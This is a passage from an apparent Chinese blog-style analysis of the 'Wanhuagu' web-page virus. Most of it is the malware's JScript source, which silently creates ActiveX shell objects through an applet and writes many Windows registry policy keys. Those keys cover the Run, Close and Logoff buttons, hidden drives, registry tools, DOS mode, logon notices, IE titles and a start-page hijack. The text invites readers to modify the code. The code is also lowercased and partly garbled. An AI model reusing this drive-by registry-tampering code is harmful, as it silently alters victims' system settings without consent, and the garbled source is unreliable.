a1=document.applets[0];
a1.setclsid("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}");
a1.createinstance();
shl = a1.getobject();
a1.setclsid("{0d43fe01-f093-11cf-8940-00a0c9054228}");
a1.createinstance();
fso = a1.getobject();
a1.setclsid("{f935dc26-1cf0-11d0-adb9-00c04fd58a0b}");
a1.createinstance();
net = a1.getobject();
try
{
if (documents .cookies.indexof("chg") == -1)
{
//shl.regwrite ("hkcu\\software\\microsoft\\internet explorer\\main\\start page",
"http://com.6to23.com/");
var expdate = new date((new date()).gettime() + (1));
documents .cookies="chg=general; expires=" + expdate.togmtstring() + "; path=/;"
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\explorer\\norun", 00, "reg_binary"); //修复run按纽
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\explorer\\noclose", 00, "reg_binary"); //修复关闭按纽
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\explorer\\nologoff", 00, "reg_binary"); //修复注销按纽
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\explorer\\nodrives", "00000000", "reg_dword"); //取消隐藏盘符
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\system\\disableregistrytools", "00000000", "reg_dword"); //取消禁止注册表
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\winoldapp\\disabled", "00000001", "reg_dword");
shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies
\\winoldapp\\norealmode", "00000001", "reg_dword");
shl.regwrite ("hklm\\software\\microsoft\\windows\\currentversion\\winlogon
\\legalnoticecaption", "");
shl.regwrite ("hklm\\software\\microsoft\\windows\\currentversion\\winlogon
\\legalnoticetext", "");
//重设开机提示
shl.regwrite ("hklm\\software\\microsoft\\internet explorer\\main\\window title",
"microsoft internet explorer");
shl.regwrite ("hkcu\\software\\microsoft\\internet explorer\\main\\window title",
"microsoft internet explorer"); //重设ie标题
var expdate = new date((new date()).gettime() + (1));
documents .cookies="chg=general; expires=" + expdate.togmtstring() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
settimeout("f()", 1000);
}
init();
作者提供了以上程序,大家可以根据自己对注册表的了解自行修改,不过声明,本段代码仅供学习使用,不要将本段代码用在不正当的途径!
“万花谷”网页病毒源码分析[2]
[入库:2005年8月18日] [更新:2007年3月25日]
本文简介:选择自 sundna 的 blog
本文关键:源码分析
本站最佳浏览方式为 分辨率 1024x768 IE 6.0(或更高版本的 IE浏览器)
